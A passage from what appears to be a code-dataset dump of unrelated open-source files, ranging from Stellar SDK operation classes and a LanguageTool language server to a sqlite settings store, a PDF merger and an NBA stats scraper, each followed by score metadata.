authorize = op_xdr_object.body.allowTrustOp.authorize
asset_type = op_xdr_object.body.allowTrustOp.asset.type
if asset_type == Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM4:
asset_code = op_xdr_object.body.allowTrustOp.asset.assetCode4.decode()
elif asset_type == Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM12:
asset_code = op_xdr_object.body.allowTrustOp.asset.assetCode12.decode()
else:
raise Exception
return cls({
'source': source,
'trustor': trustor,
'authorize': authorize,
'asset_code': asset_code
})
class SetOptions(Operation):
def __init__(self, opts):
super(SetOptions, self).__init__(opts)
self.inflation_dest = opts.get('inflation_dest')
self.clear_flags = opts.get('clear_flags')
self.set_flags = opts.get('set_flags')
self.master_weight = opts.get('master_weight')
self.low_threshold = opts.get('low_threshold')
self.med_threshold = opts.get('med_threshold')
self.high_threshold = opts.get('high_threshold')
self.home_domain = opts.get('home_domain')
self.signer_address = opts.get('signer_address')
self.signer_type = opts.get('signer_type')
self.signer_weight = opts.get('signer_weight')
if self.signer_address is not None and self.signer_type is None:
try:
decode_check('account', self.signer_address)
except DecodeError:
raise Exception('must be a valid strkey if not give signer_type')
self.signer_type = 'ed25519PublicKey'
if self.signer_type in ('hashX', 'preAuthTx') and \
(self.signer_address is None or len(self.signer_address) != 32):
raise Exception('hashX or preAuthTx Signer must be 32 bytes')
if self.signer_type is not None and self.signer_type not in ('ed25519PublicKey', 'hashX', 'preAuthTx'):
raise Exception('invalid signer type.')
def to_xdr_object(self):
def assert_option_array(x):
if x is None:
return []
if not isinstance(x, list):
return [x]
return x
if self.inflation_dest is not None:
inflation_dest = [account_xdr_object(self.inflation_dest)]
else:
inflation_dest = []
self.clear_flags = assert_option_array(self.clear_flags)
self.set_flags = assert_option_array(self.set_flags)
self.master_weight = assert_option_array(self.master_weight)
self.low_threshold = assert_option_array(self.low_threshold)
self.med_threshold = assert_option_array(self.med_threshold)
self.high_threshold = assert_option_array(self.high_threshold)
self.home_domain = assert_option_array(self.home_domain)
if self.signer_address is not None and \
self.signer_type is not None and \
self.signer_weight is not None:
signer = [
Xdr.types.Signer(signer_key_xdr_object(self.signer_type, self.signer_address), self.signer_weight)]
else:
signer = []
set_options_op = Xdr.types.SetOptionsOp(inflation_dest, self.clear_flags, self.set_flags,
self.master_weight, self.low_threshold, self.med_threshold,
self.high_threshold, self.home_domain, signer)
self.body.type = Xdr.const.SET_OPTIONS
self.body.setOptionsOp = set_options_op
return super(SetOptions, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
if not op_xdr_object.body.setOptionsOp.inflationDest:
inflation_dest = None
else:
inflation_dest = encode_check('account', op_xdr_object.body.setOptionsOp.inflationDest[0].ed25519).decode()
clear_flags = op_xdr_object.body.setOptionsOp.clearFlags # list
set_flags = op_xdr_object.body.setOptionsOp.setFlags
master_weight = op_xdr_object.body.setOptionsOp.masterWeight
low_threshold = op_xdr_object.body.setOptionsOp.lowThreshold
med_threshold = op_xdr_object.body.setOptionsOp.medThreshold
high_threshold = op_xdr_object.body.setOptionsOp.highThreshold
home_domain = op_xdr_object.body.setOptionsOp.homeDomain
if op_xdr_object.body.setOptionsOp.signer:
key = op_xdr_object.body.setOptionsOp.signer[0].key
if key.type == Xdr.const.SIGNER_KEY_TYPE_ED25519:
signer_address = encode_check('account', key.ed25519).decode()
signer_type = 'ed25519PublicKey'
if key.type == Xdr.const.SIGNER_KEY_TYPE_PRE_AUTH_TX:
signer_address = key.preAuthTx
signer_type = 'preAuthTx'
if key.type == Xdr.const.SIGNER_KEY_TYPE_HASH_X:
signer_address = key.hashX
signer_type = 'hashX'
signer_weight = op_xdr_object.body.setOptionsOp.signer[0].weight
else:
signer_address = None
signer_type = None
signer_weight = None
return cls({
'source': source,
'inflation_dest': inflation_dest,
'clear_flags': clear_flags,
'set_flags': set_flags,
'master_weight': master_weight,
'low_threshold': low_threshold,
'med_threshold': med_threshold,
'high_threshold': high_threshold,
'home_domain': home_domain,
'signer_address': signer_address,
'Signer_type': signer_type,
'signer_weight': signer_weight
})
class ManageOffer(Operation):
def __init__(self, opts):
super(ManageOffer, self).__init__(opts)
self.selling = opts.get('selling') # Asset
self.buying = opts.get('buying') # Asset
self.amount = opts.get('amount')
self.price = opts.get('price')
self.offer_id = opts.get('offer_id', 0)
def to_xdr_object(self):
selling = self.selling.to_xdr_object()
buying = self.buying.to_xdr_object()
price = best_r(self.price)
price = Xdr.types.Price(price['n'], price['d'])
amount = Operation.to_xdr_amount(self.amount)
manage_offer_op = Xdr.types.ManageOfferOp(selling, buying, amount, price, self.offer_id)
self.body.type = Xdr.const.MANAGE_OFFER
self.body.manageOfferOp = manage_offer_op
return super(ManageOffer, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
selling = Asset.from_xdr_object(op_xdr_object.body.manageOfferOp.selling)
buying = Asset.from_xdr_object(op_xdr_object.body.manageOfferOp.buying)
amount = Operation.from_xdr_amount(op_xdr_object.body.manageOfferOp.amount)
n = op_xdr_object.body.manageOfferOp.price.n
d = op_xdr_object.body.manageOfferOp.price.d
price = division(n, d)
offer_id = op_xdr_object.body.manageOfferOp.offerID
return cls({
'source': source,
'selling': selling,
'buying': buying,
'amount': amount,
'price': price,
'offer_id': offer_id
})
class CreatePassiveOffer(Operation):
def __init__(self, opts):
super(CreatePassiveOffer, self).__init__(opts)
self.selling = opts.get('selling')
self.buying = opts.get('buying')
self.amount = opts.get('amount')
self.price = opts.get('price')
def to_xdr_object(self):
selling = self.selling.to_xdr_object()
buying = self.buying.to_xdr_object()
price = best_r(self.price)
price = Xdr.types.Price(price['n'], price['d'])
amount = Operation.to_xdr_amount(self.amount)
create_passive_offer_op = Xdr.types.CreatePassiveOfferOp(selling, buying, amount, price)
self.body.type = Xdr.const.CREATE_PASSIVE_OFFER
self.body.createPassiveOfferOp = create_passive_offer_op
return super(CreatePassiveOffer, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
selling = Asset.from_xdr_object(op_xdr_object.body.createPassiveOfferOp.selling)
buying = Asset.from_xdr_object(op_xdr_object.body.createPassiveOfferOp.buying)
amount = Operation.from_xdr_amount(op_xdr_object.body.createPassiveOfferOp.amount)
n = op_xdr_object.body.createPassiveOfferOp.price.n
d = op_xdr_object.body.createPassiveOfferOp.price.d
price = division(n, d)
return cls({
'source': source,
'selling': selling,
'buying': buying,
'amount': amount,
'price': price
})
class AccountMerge(Operation):
def __init__(self, opts):
super(AccountMerge, self).__init__(opts)
self.destination = opts.get('destination')
def to_xdr_object(self):
destination = account_xdr_object(self.destination)
self.body.type = Xdr.const.ACCOUNT_MERGE
self.body.destination = destination
return super(AccountMerge, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
destination = encode_check('account', op_xdr_object.body.destination.ed25519).decode()
return cls({
'source': source,
'destination': destination
})
class Inflation(Operation):
def __init__(self, opts):
super(Inflation, self).__init__(opts)
def to_xdr_object(self):
self.body.type = Xdr.const.INFLATION
return super(Inflation, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
return cls({'source': source})
class ManageData(Operation):
def __init__(self, opts):
super(ManageData, self).__init__(opts)
self.data_name = opts.get('data_name')
self.data_value = opts.get('data_value')
if len(self.data_name) > 64 or (self.data_value is not None and len(self.data_value) > 64):
raise XdrLengthError("Data or value should be <= 64 bytes (ascii encoded). ")
def to_xdr_object(self):
data_name = bytearray(self.data_name, encoding='utf-8')
if self.data_value is not None:
data_value = [bytearray(self.data_value, 'utf-8')]
else:
data_value = []
manage_data_op = Xdr.types.ManageDataOp(data_name, data_value)
self.body.type = Xdr.const.MANAGE_DATA
self.body.manageDataOp = manage_data_op
return super(ManageData, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
data_name = op_xdr_object.body.manageDataOp.dataName.decode()
if op_xdr_object.body.manageDataOp.dataValue:
data_value = op_xdr_object.body.manageDataOp.dataValue[0].decode()
else:
data_value = None
return cls({
'source': source,
'data_name': data_name,
'data_value': data_value
})
| 2.203125 | 2 |
PSet3/MIT_6.00.1x_PSet3_P2_Andrey_Tymofeiuk.py | atymofeiuk/MIT_6.00.1x_Andrey_Tymofeiuk | 0 | 12761515 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 15 13:58:31 2017
MIT 6.00.1x course on edX.org: PSet3 P2
Next, implement the function getGuessedWord that takes in two parameters
- a string, secretWord, and a list of letters, lettersGuessed. This function
returns a string that is comprised of letters and underscores, based on what
letters in lettersGuessed are in secretWord. This shouldn't be too different
from isWordGuessed!
@author: <NAME>
Important: This code is placed at GitHub to track my progress in programming and
to show my way of thinking. Also I will be happy if somebody will find my solution
interesting. But I respect The Honor Code and I ask you to respect it also - please
don't use this solution to pass the MIT 6.00.1x course.
"""
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
guess = ""
for letter in secretWord:
if letter in lettersGuessed:
guess += letter
else:
guess += " _"
return guess
| 3.90625 | 4 |
anviz_sync/__init__.py | sergiocorato/anviz-sync | 11 | 12761516 | """
anviz_sync
~~~~~~~~~~
Sync Anviz Time & Attendance data with specified database.
:copyright: (c) 2014 by <NAME>
:license: BSD, see LICENSE for more details.
"""
__version__ = '0.1.0'
| 1.0625 | 1 |
ltls_server.py | dpriedel/languagetool_languageserver | 1 | 12761517 | <reponame>dpriedel/languagetool_languageserver
#!/usr/bin/python
############################################################################
# #
# Licensed under the Apache License, Version 2.0 (the "License") #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http: // www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import argparse
import logging
import sys
import os
import asyncio
import json
import subprocess
import urllib3
import time
from urllib.parse import urlparse
from pygls.lsp.methods import (TEXT_DOCUMENT_DID_SAVE,
TEXT_DOCUMENT_DID_CLOSE, TEXT_DOCUMENT_DID_OPEN)
from pygls.lsp.types import (ConfigurationItem, ConfigurationParams, Diagnostic,
DiagnosticSeverity, TextDocumentSaveRegistrationOptions,
DidSaveTextDocumentParams,
DidCloseTextDocumentParams, DidOpenTextDocumentParams,
MessageType, Position, Range, Registration,
RegistrationParams, Unregistration,
UnregistrationParams)
from pygls.server import LanguageServer
logging.basicConfig(filename="/tmp/pyltls.log", level=logging.INFO, filemode="w")
def _find_line_ends(content: str):
results: list[int] = []
loc: int = content.find('\n')
while loc > -1:
results.append(loc)
loc = content.find('\n', loc + 1)
return results
def _convert_offset_to_line_col(offsets: list[int], offset: int) -> tuple[int, int]:
""" just as it says, translate a zero-based offset to a line and column."""
line: int = 0
col: int = 0
try:
while offsets[line] < offset:
line += 1
except IndexError as e:
pass
col = offset - offsets[line - 1] if line > 0 else offset + 1
return(line, col - 1)
class LanguageToolLanguageServer(LanguageServer):
CONFIGURATION_SECTION = 'ltlsServer'
def __init__(self):
super().__init__()
self.languagetool_: subprocess.Popen = None
self.language_: str = None
self.port_: str = None
self.http_ = urllib3.PoolManager()
def __del__(self):
self.languagetool_.kill()
outs, errs = self.languagetool_.communicate()
def StartLanguageTool(self, args):
try:
# we need to capture stdout, stderr because the languagetool server
# emits several messages and we don't want them to go to the LSP client.
self.language_ = args.language_
self.port_ = args.port_
command_and_args: list[str] = [args.command_, "--http"]
if args.port_ != 8081:
command_and_args.append("-p")
command_and_args.append(args.port_)
if args.languageModel_:
command_and_args.append("--languageModel")
command_and_args.append(args.languageModel_)
if args.word2vecModel_:
command_and_args.append("--word2vecModel")
command_and_args.append(args.word2vecModel_)
self.languagetool_ = subprocess.Popen(command_and_args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
time.sleep(2.0) # we need to give some time for the server to start.
# outs, errs = self.languagetool_.communicate()
except Exception as e:
self.show_message('Error ocurred: {}'.format(e))
self.start_io()
ltls_server = LanguageToolLanguageServer()
def _publish_diagnostics(server: LanguageToolLanguageServer, uri: str, doc_content: str, results: dict):
"""Helper function to publish diagnostics for a file.
results is already in json format from requests library."""
offsets = _find_line_ends(doc_content)
diagnostics = []
for error in results["matches"]:
offset = int(error["offset"])
line, col = _convert_offset_to_line_col(offsets, offset)
d = Diagnostic(
range=Range(
start=Position(line=line, character=col),
end=Position(line=line, character=col + int(error["length"]))
),
message=error["message"] + ' ' + error["rule"]["id"],
severity=DiagnosticSeverity.Error,
source="ltls"
)
diagnostics.append(d)
server.publish_diagnostics(uri, diagnostics)
# TEXT_DOCUMENT_DID_SAVE
@ltls_server.feature(TEXT_DOCUMENT_DID_SAVE, TextDocumentSaveRegistrationOptions(includeText=True))
async def did_save(server: LanguageToolLanguageServer, params: DidSaveTextDocumentParams):
"""Actions run on textDocument/didSave."""
# when we registered this function we told the client that we want
# the text when the file is saved. If we don't get it we'll fall
# back to reading the file.
doc_content: str = ""
if params.text:
doc_content = params.text
else:
fname = urlparse(params.text_document.uri, scheme="file")
with open(fname.path, mode='r', encoding='utf-8') as saved_file:
doc_content = saved_file.read()
payload = {'language': server.language_, 'text': doc_content}
url = 'http://localhost:' + server.port_ + '/v2/check'
try:
req = server.http_.request('GET', url, fields=payload, retries=urllib3.Retry(connect=5, backoff_factor=0.3))
_publish_diagnostics(server, params.text_document.uri, doc_content, json.loads(req.data.decode('utf-8')))
except Exception as e:
server.show_message('Error ocurred: {}'.format(e))
# TEXT_DOCUMENT_DID_OPEN
@ltls_server.feature(TEXT_DOCUMENT_DID_OPEN)
async def did_open(server: LanguageToolLanguageServer, params: DidOpenTextDocumentParams):
"""Actions run on textDocument/didOpen."""
doc_content = params.text_document.text
payload = {'language': server.language_, 'text': doc_content}
url = 'http://localhost:' + server.port_ + '/v2/check'
try:
req = server.http_.request('GET', url, fields=payload, retries=urllib3.Retry(connect=5, backoff_factor=0.3))
_publish_diagnostics(server, params.text_document.uri, doc_content, json.loads(req.data.decode('utf-8')))
except Exception as e:
server.show_message('Error ocurred: {}'.format(e))
def add_arguments(parser):
parser.description = "LanguageTool language http server on local host."
parser.add_argument(
"-l", "--language", type=str, dest="language_", default="en",
help="Which language to use. Default is 'en'. Use 'en-US' for spell checking."
)
parser.add_argument(
"-c", "--command", type=str, dest="command_", default="/usr/bin/languagetool",
help="command to run language tool. Default is '/usr/bin/languagetool'."
)
parser.add_argument(
"--languageModel", type=str, dest="languageModel_", default="",
help="Optional directory containing 'n-grams'."
)
parser.add_argument(
"--word2vecModel", type=str, dest="word2vecModel_", default="",
help="Optional directory containing word2vec neural net data."
)
parser.add_argument(
"-p", "--port", type=str, dest="port_", default="8081",
help="Use this port for LanguageTool. Default is 8081. "
)
def main():
parser = argparse.ArgumentParser()
add_arguments(parser)
args = parser.parse_args()
ltls_server.StartLanguageTool(args)
if __name__ == '__main__':
main()
| 1.539063 | 2 |
third_party/antlr_grammars_v4/python/tiny-python/tiny-grammar-without-actions/test_auto_trailing_NEWLINE_2.py | mikhan808/rsyntaxtextarea-antlr4-extension | 2 | 12761518 | if i == 0:
i = 1 # there is no NEWLINE at the end of the code | 2.171875 | 2 |
database.py | klowe0100/botamusique | 0 | 12761519 | import sqlite3
class DatabaseError(Exception):
pass
class Database:
def __init__(self, db_path):
self.db_path = db_path
# connect
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
# check if table exists, or create one
tables = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='botamusique';").fetchall()
if len(tables) == 0:
cursor.execute("CREATE TABLE botamusique (section text, option text, value text, UNIQUE(section, option))")
conn.commit()
conn.close()
def get(self, section, option, **kwargs):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
result = cursor.execute("SELECT value FROM botamusique WHERE section=? AND option=?", (section, option)).fetchall()
conn.close()
if len(result) > 0:
return result[0][0]
else:
if 'fallback' in kwargs:
return kwargs['fallback']
else:
raise DatabaseError("Item not found")
def getboolean(self, section, option, **kwargs):
return bool(int(self.get(section, option, **kwargs)))
def getfloat(self, section, option, **kwargs):
return float(self.get(section, option, **kwargs))
def getint(self, section, option, **kwargs):
return int(self.get(section, option, **kwargs))
def set(self, section, option, value):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
cursor.execute('''
INSERT OR REPLACE INTO botamusique (section, option, value)
VALUES (?, ?, ?)
''', (section, option, value))
conn.commit()
conn.close()
def has_option(self, section, option):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
result = cursor.execute("SELECT value FROM botamusique WHERE section=? AND option=?", (section, option)).fetchall()
conn.close()
if len(result) > 0:
return True
else:
return False
def remove_option(self, section, option):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM botamusique WHERE section=? AND option=?", (section, option))
conn.commit()
conn.close()
def remove_section(self, section):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM botamusique WHERE section=?", (section, ))
conn.commit()
conn.close()
def items(self, section):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
results = cursor.execute("SELECT option, value FROM botamusique WHERE section=?", (section, )).fetchall()
conn.close()
return map(lambda v: (v[0], v[1]), results)
def drop_table(self):
conn = sqlite3.connect(self.db_path)
cursor = conn.cursor()
cursor.execute("DROP TABLE botamusique")
conn.close()
| 3.359375 | 3 |
app/assets.py | edtechhub/adaptdev | 0 | 12761520 | from flask_assets import Bundle, Environment
scss_styles = Bundle( # pylint: disable=invalid-name
'src/app/scss/styles.scss',
filters='libsass',
depends='**/*.scss',
output='build/css/styles.css',
)
css_styles = Bundle( # pylint: disable=invalid-name
scss_styles,
filters='autoprefixer6',
output='dist/css/styles.css',
)
css_min_styles = Bundle( # pylint: disable=invalid-name
scss_styles,
filters='autoprefixer6,cleancss',
output='dist/css/styles.min.css',
)
common_js = Bundle( # pylint: disable=invalid-name
'src/vendor/jquery/jquery.min.js',
'src/vendor/popper.js/popper.min.js',
'src/vendor/bootstrap/index.js',
'src/vendor/bootstrap/util.js',
'src/vendor/bootstrap/collapse.js', # For navbar.
'src/vendor/bootstrap/alert.js',
'src/vendor/bootstrap/button.js',
'src/vendor/bootstrap/dropdown.js',
'src/vendor/bootstrap/modal.js',
'src/vendor/bootstrap/tab.js',
filters='jsmin',
output='dist/js/common.min.js',
)
search_js = Bundle( # pylint: disable=invalid-name
'kerko/kerko/js/search.js',
filters='jsmin',
output='dist/js/search.min.js',
)
item_js = Bundle( # pylint: disable=invalid-name
'kerko/kerko/js/item.js',
filters='jsmin',
output='dist/js/item.min.js',
)
print_js = Bundle( # pylint: disable=invalid-name
'kerko/kerko/js/print.js',
filters='jsmin',
output='dist/js/print.min.js',
)
class EnvironmentWithBundles(Environment):
"""
An assets environment that registers its own bundles.
Registering the bundles at `init_app` time lets it refer to the app config.
"""
def init_app(self, app):
super().init_app(app)
if app.config['ASSETS_DEBUG']:
assets.register('css_styles', css_styles)
else:
assets.register('css_styles', css_min_styles)
assets.register('common_js', common_js)
assets.register('search_js', search_js)
assets.register('item_js', item_js)
assets.register('print_js', print_js)
assets = EnvironmentWithBundles() # pylint: disable=invalid-name
| 1.695313 | 2 |
src/brewlog/tasting/forms.py | zgoda/brewlog | 3 | 12761521 | <filename>src/brewlog/tasting/forms.py
from flask_babel import lazy_gettext as _
from flask_login import current_user
from wtforms.fields import TextAreaField
from wtforms.fields.html5 import DateField
from wtforms.validators import InputRequired
from ..forms.base import BaseObjectForm
from ..models import TastingNote
class TastingNoteForm(BaseObjectForm):
date = DateField(_('date'), validators=[InputRequired()])
text = TextAreaField(_('text'), validators=[InputRequired()])
def save(self, brew, save=True):
obj = TastingNote(brew=brew, author=current_user)
return super(TastingNoteForm, self).save(obj, save)
| 2.25 | 2 |
grAdapt/models/Asynchronous.py | mkduong-ai/grAdapt | 25 | 12761522 | # Python Standard Libraries
import warnings
import time
import os
import sys
from pathlib import Path
# Third party imports
# fancy prints
import numpy as np
from tqdm import tqdm
# grAdapt package
import grAdapt.utils.math
import grAdapt.utils.misc
import grAdapt.utils.sampling
from grAdapt import surrogate as sur, optimizer as opt, escape as esc
from grAdapt.space.transformer import Transformer
from grAdapt.sampling import initializer as init, equidistributed as equi
class Asynchronous:
def __init__(self, bounds, surrogate=None, optimizer=None, sampling_method=None,
escape=None, training=None, random_state=1,
n_evals='auto', eps=1e-3, f_min=-np.inf, f_min_eps=1e-2, n_random_starts='auto',
auto_checkpoint=False, show_progressbar=True, prints=True):
"""
Parameters
----------
bounds : list
list of tuples e.g. [(-5, 5), (-5, 5)]
surrogate : grAdapt Surrogate object
optimizer : grAdapt Optimizer object
sampling_method : Sampling Method to be used. static method from utils
escape : grAdapt Escape object
training : (X, y) with X shape (n, m) and y shape (n,)
random_state : integer
random_state integer sets numpy seed
bounds : list
list of tuples e.g. [(-5, 5), (-5, 5)]
"""
# Stock module settings
self.bounds = bounds
# seed
self.random_state = random_state
np.random.seed(self.random_state)
if surrogate is None:
self.surrogate = sur.GPRSlidingWindow()
else:
self.surrogate = surrogate
if optimizer is None:
self.optimizer = opt.AMSGradBisection(surrogate=self.surrogate)
else:
self.optimizer = optimizer
if surrogate is None:
raise Exception('If optimizer is passed, then surrogate must be passed, too.')
if sampling_method is None:
self.sampling_method = equi.MaximalMinDistance()
else:
self.sampling_method = sampling_method
if escape is None:
self.escape = esc.NormalDistributionDecay(surrogate=self.surrogate, sampling_method=self.sampling_method)
else:
self.escape = escape
if surrogate is None or sampling_method is None:
raise Exception('When passing an escape function, surrogate and sampling_method must be passed, too.')
# other settings
# continue optimizing
self.training = training
if training is not None:
self.X = list(training[0])
self.y = list(training[1])
if len(self.X) != len(self.y):
raise AssertionError('Training data not valid. Length of X and y must be the same.')
# self.fit(self.X, self.y)
else:
self.X = list(grAdapt.utils.sampling.sample_points_bounds(self.bounds, 11))
self.y = []
self.n_evals = n_evals
self.eps = eps
self.f_min = f_min
self.f_min_eps = f_min_eps
self.n_random_starts = n_random_starts
# keep track of checkpoint files
self.checkpoint_file = None
self.auto_checkpoint = auto_checkpoint
# results
self.res = None
self.show_progressbar = show_progressbar
self.prints = prints
# save current iteration
if training is not None:
self.iteration = len(self.X) - 1
else:
self.iteration = 0
def escape_x_criteria(self, x_train, iteration):
"""Checks whether new point is different than the latest point by the euclidean distance
Checks whether new point is inside the defined search space/bounds.
Returns True if one of the conditions above are fulfilled.
Parameters
----------
x_train : ndarray (n, d)
iteration : integer
Returns
-------
boolean
"""
# x convergence
# escape_convergence = (np.linalg.norm(x_train[iteration - 1] - x_train[iteration])) < self.eps
n_hist = 2
escape_convergence_history = any(
(np.linalg.norm(x_train[iteration - (n_hist + 1):] - x_train[iteration - 1], axis=1)) < self.eps)
# check whether point is inside bounds
escape_valid = not (grAdapt.utils.sampling.inside_bounds(self.bounds, x_train[iteration - 1]))
# escape_x = escape_convergence or escape_valid
escape_x = escape_convergence_history or escape_valid
return escape_x
@staticmethod
def escape_y_criteria(y_train, iteration, pct):
"""
Parameters
----------
y_train : array-like (n, d)
iteration : integer
pct : numeric
pct should be less than 1.
Returns
-------
boolean
"""
try:
return grAdapt.utils.misc.is_inside_relative_range(y_train[iteration - 1], y_train[iteration - 2], pct)
except:
return False
def dummy(self):
return 0
def ask(self):
if len(self.X) > len(self.y): # initial points
self.iteration += 1
# if user asks consecutively without telling
if self.iteration == len(self.y) + 2:
self.iteration -= 1
warnings.warn("Tell the optimizer/model after you ask.", RuntimeWarning)
return self.X[self.iteration - 1]
else:
# gradient parameters specific for the surrogate model
surrogate_grad_params = [np.array(self.X[:self.iteration]), np.array(self.y[:self.iteration]),
self.dummy, self.bounds]
# apply optimizer
return_x = self.optimizer.run(self.X[self.iteration - 1],
grAdapt.utils.misc.epochs(self.iteration),
surrogate_grad_params)
# escape indicator variables
escape_x_criteria_boolean = self.escape_x_criteria(np.array(self.X), self.iteration)
escape_y_criteria_boolean = self.escape_y_criteria(self.y, self.iteration, self.f_min_eps)
escape_boolean = escape_x_criteria_boolean or escape_y_criteria_boolean
# sample new point if must escape or bounds not valid
if escape_boolean:
return_x = self.escape.get_point(self.X[:self.iteration], self.y[:self.iteration],
self.iteration, self.bounds)
self.iteration += 1
# save current training data
return return_x
def tell(self, next_x, f_val):
if len(self.X) > len(self.y):
# no need to append x
self.y.append(f_val)
elif len(self.X) == len(self.y):
# append
self.X.append(next_x)
self.y.append(f_val)
else:
raise RuntimeError('More function values available than x values/parameter sets.')
# Fit data on surrogate model
self.surrogate.fit(np.array(self.X[:self.iteration]), np.array(self.X[:self.iteration]))
| 2.171875 | 2 |
python/PDF/pdfcat.py | eucalypto/potato | 0 | 12761523 | <filename>python/PDF/pdfcat.py
#! /usr/bin/env python
from PyPDF2 import PdfFileReader, PdfFileWriter
import sys
def merge_pdfs(paths, output):
"""take pdf files defined in array files and concatenate them
into one PDF with output name output.
"""
pdf_writer = PdfFileWriter()
for path in paths:
pdf_reader = PdfFileReader(path)
for pagenum in range(pdf_reader.getNumPages()):
pdf_writer.addPage(pdf_reader.getPage(pagenum))
with open(output, "wb") as out:
pdf_writer.write(out)
if __name__ == '__main__':
"""
Take files from command line input parameters. The last one is the
output destination. All others are input files:
pdfcat.py input1.pdf input2.pdf input3.pdf output.pdf
"""
inputfiles = sys.argv[1:len(sys.argv)-1]
outputfile = sys.argv[-1]
# print("infputfiles: ", inputfiles)
# print("outputfile: ", outputfile)
merge_pdfs(inputfiles, outputfile)
| 3.65625 | 4 |
host_manager_19/rbac/migrations/0006_menu_weight.py | gengna92/PythonProjects | 0 | 12761524 | <reponame>gengna92/PythonProjects
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-16 06:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rbac', '0005_auto_20190616_1137'),
]
operations = [
migrations.AddField(
model_name='menu',
name='weight',
field=models.IntegerField(default=1),
),
]
| 1.445313 | 1 |
tests/core/test_setproctitle.py | inan0812/chia-blockchain | 1 | 12761525 | import unittest
from inan.util.setproctitle import setproctitle
class TestSetProcTitle(unittest.TestCase):
def test_does_not_crash(self):
setproctitle("inan test title")
| 2 | 2 |
astronomy_datamodels/tags/obs_context.py | spacetelescope/astronomy_datamodels | 1 | 12761526 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from asdf import yamlutil
from asdf.versioning import AsdfSpec
from ..types import AstronomyDataModelType
from ..obs_context import ObsContext
class ObsContextType(AstronomyDataModelType):
name = 'datamodel/obs_context'
version = '1.0.0'
supported_versions = ['1.0.0']
types = ['astronomy_datamodels.obs_context.ObsContext']
requires = ["astropy"]
@classmethod
def to_tree(cls, node, ctx): # to ASDF representation
d = {}
if node.telescope is not None:
d['telescope'] = yamlutil.custom_tree_to_tagged_tree(node.telescope, ctx)
if node.instrument is not None:
d['instrument'] = yamlutil.custom_tree_to_tagged_tree(node.instrument, ctx)
if node.proposal is not None:
d['proposal'] = yamlutil.custom_tree_to_tagged_tree(node.proposal, ctx)
if node.observers is not None:
d['observers'] = yamlutil.custom_tree_to_tagged_tree(node.observers, ctx)
if node.target is not None:
d['target'] = yamlutil.custom_tree_to_tagged_tree(node.target, ctx)
if node.associated_data is not None:
d['associated_data'] = yamlutil.custom_tree_to_tagged_tree(node.associated_data, ctx)
if node.meta is not None:
d['meta'] = yamlutil.custom_tree_to_tagged_tree(node.meta, ctx)
return d
@classmethod
def from_tree(cls, node, ctx): # from ASDF to object representation
obscontext = ObsContext()
if 'telescope' in node:
obscontext.telescope = yamlutil.tagged_tree_to_custom_tree(node['telescope'], ctx)
if 'instrument' in node:
obscontext.instrument = yamlutil.tagged_tree_to_custom_tree(node['instrument'], ctx)
if 'proposal' in node:
obscontext.proposal = yamlutil.tagged_tree_to_custom_tree(node['proposal'], ctx)
if 'observers' in node:
obscontext.observers = yamlutil.tagged_tree_to_custom_tree(node['observers'], ctx)
if 'target' in node:
obscontext.target = yamlutil.tagged_tree_to_custom_tree(node['target'], ctx)
if 'associated_data' in node:
obscontext.associated_data = yamlutil.tagged_tree_to_custom_tree(node['associated_data'], ctx)
if 'meta' in node:
obscontext.meta = yamlutil.tagged_tree_to_custom_tree(node['meta'], ctx)
return obscontext
@classmethod
def assert_equal(cls, old, new):
pass
| 2.078125 | 2 |
basketball_analysis/Requests/Requests.py | ArjunMehta01/basketball_analysis | 0 | 12761527 | import pandas as pd
from bs4 import BeautifulSoup
from urllib.request import urlopen
class nba_request():
def __init__(self):
self.url = 'https://www.basketball-reference.com/leagues/NBA_' # NOT A FULL URL
def totals(self, url, year):
""" This gets the total statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_totals.html', year)
def per_game(self,url, year):
""" This gets the per-game statistics in a season
